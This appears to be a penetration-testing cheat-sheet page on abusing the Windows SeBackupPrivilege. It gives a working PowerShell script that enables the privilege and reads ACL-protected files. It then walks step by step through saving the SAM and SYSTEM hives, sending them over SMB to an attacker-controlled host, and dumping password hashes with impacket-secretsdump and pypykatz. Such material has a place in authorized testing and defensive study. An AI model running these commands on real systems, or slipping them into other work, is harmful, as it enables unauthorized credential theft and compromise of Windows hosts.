SeBackupPrivilege

A Windows privilege that lets a process bypass file and registry ACL checks for read access when it opens an object with backup semantics, so that backup software can read everything on the system. It is assigned by default to Administrators, Backup Operators, and Server Operators, but it sits in the token in a disabled state: a process must enable it (via AdjustTokenPrivileges) before it takes effect.

Backup-aware tools (e.g., reg.exe, robocopy with /B, ntbackup) enable the privilege at runtime and open files with FILE_FLAG_BACKUP_SEMANTICS, which is why they can read protected objects regardless of their ACLs while a plain copy or type from the same shell is still denied.
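As an added example (not code from the original page) of what those tools do internally, the following PowerShell script enables SeBackupPrivilege in the current process token with AdjustTokenPrivileges and then reads a file opened with FILE_FLAG_BACKUP_SEMANTICS, copying it to a writeable location. The source and destination paths are assumptions. It only works for a token that already holds the privilege (e.g. a Backup Operators member): the privilege can be enabled, never granted, and the script fails with ERROR_NOT_ALL_ASSIGNED (1300) otherwise.

```powershell
# Added example: enable SeBackupPrivilege and copy an ACL-protected file
# with backup semantics, the same mechanism reg.exe and robocopy /B rely on.
$src = 'C:\Users\Administrator\Desktop\secret.txt'   # assumed protected file
$dst = 'C:\Windows\Temp\secret.txt'                   # assumed writeable target

Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;

public static class BackupPriv {
    [StructLayout(LayoutKind.Sequential)]
    struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)]
    struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }

    const uint TOKEN_ADJUST_PRIVILEGES = 0x0020, TOKEN_QUERY = 0x0008;
    const uint SE_PRIVILEGE_ENABLED = 0x00000002;
    const uint GENERIC_READ = 0x80000000, FILE_SHARE_READ = 1, OPEN_EXISTING = 3;
    const uint FILE_FLAG_BACKUP_SEMANTICS = 0x02000000;

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr h, uint access, out IntPtr tok);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool AdjustTokenPrivileges(IntPtr tok, bool disableAll,
        ref TOKEN_PRIVILEGES newState, uint len, IntPtr prev, IntPtr retLen);
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern SafeFileHandle CreateFile(string name, uint access, uint share,
        IntPtr sa, uint disp, uint flags, IntPtr template);
    [DllImport("kernel32.dll")] static extern IntPtr GetCurrentProcess();

    // Enable SeBackupPrivilege in our own token. AdjustTokenPrivileges returns TRUE
    // even when the privilege is missing, so the result must be read from GetLastError.
    public static void Enable() {
        IntPtr tok;
        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out tok))
            throw new System.ComponentModel.Win32Exception();
        TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES { PrivilegeCount = 1, Attributes = SE_PRIVILEGE_ENABLED };
        if (!LookupPrivilegeValue(null, "SeBackupPrivilege", out tp.Luid))
            throw new System.ComponentModel.Win32Exception();
        if (!AdjustTokenPrivileges(tok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero))
            throw new System.ComponentModel.Win32Exception();
        int err = Marshal.GetLastWin32Error();
        if (err != 0) throw new System.ComponentModel.Win32Exception(err); // 1300 = not assigned
    }

    // Open with FILE_FLAG_BACKUP_SEMANTICS: with the privilege enabled the ACL is not
    // evaluated for read access, so the open succeeds where a normal open is denied.
    public static byte[] ReadWithBackupSemantics(string path) {
        SafeFileHandle h = CreateFile(path, GENERIC_READ, FILE_SHARE_READ, IntPtr.Zero,
                                      OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, IntPtr.Zero);
        if (h.IsInvalid) throw new System.ComponentModel.Win32Exception();
        using (var fs = new System.IO.FileStream(h, System.IO.FileAccess.Read)) {
            byte[] buf = new byte[fs.Length];
            int n = 0;
            while (n < buf.Length) n += fs.Read(buf, n, buf.Length - n);
            return buf;
        }
    }
}
'@

# Step 1: the privilege must already be present in the token (Disabled is fine).
whoami /priv | Select-String SeBackupPrivilege

# Step 2: enable it, read the protected file with backup semantics, write the copy out.
[BackupPriv]::Enable()
[System.IO.File]::WriteAllBytes($dst, [BackupPriv]::ReadWithBackupSemantics($src))
Get-Item $dst | Select-Object FullName, Length
```

Running the same script from a token without the privilege (or with it stripped by UAC filtering in a non-elevated Administrators session) throws at Enable(), which is the quickest way to tell whether a given shell can be used for the hive dump below.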

Exploitation

For Active Directory exploitation (abusing the privilege on a domain controller), see the Backup Operators and Server Operators pages.

First confirm the token holds the privilege (whoami /priv lists SeBackupPrivilege, usually as Disabled, which is fine because reg.exe enables it itself), then move to a writeable directory and save the hives:

# Move to a writeable directory
cd c:\windows\temp

# Copy the SAM and SYSTEM hives
reg save hklm\sam c:\windows\temp\sam
reg save hklm\system c:\windows\temp\system

Transfer the hives to the attacking host (preferably via SMB rather than WinRM, which is slow and unreliable for binary files):

# Start an SMB server serving the current directory only (not the whole filesystem)
sudo impacket-smbserver share -smb2support "$(pwd)" -user test -password test

Connect and copy the hives:

# Connect to the share
net use z: \\<attacker-IP>\share /user:test test

# Copy the hives
copy sam z:\
copy system z:\

Dump the creds on the attacking host:

# Dump creds with impacket
impacket-secretsdump -sam sam -system system LOCAL

# Dump creds with pypykatz
pypykatz registry --sam sam system
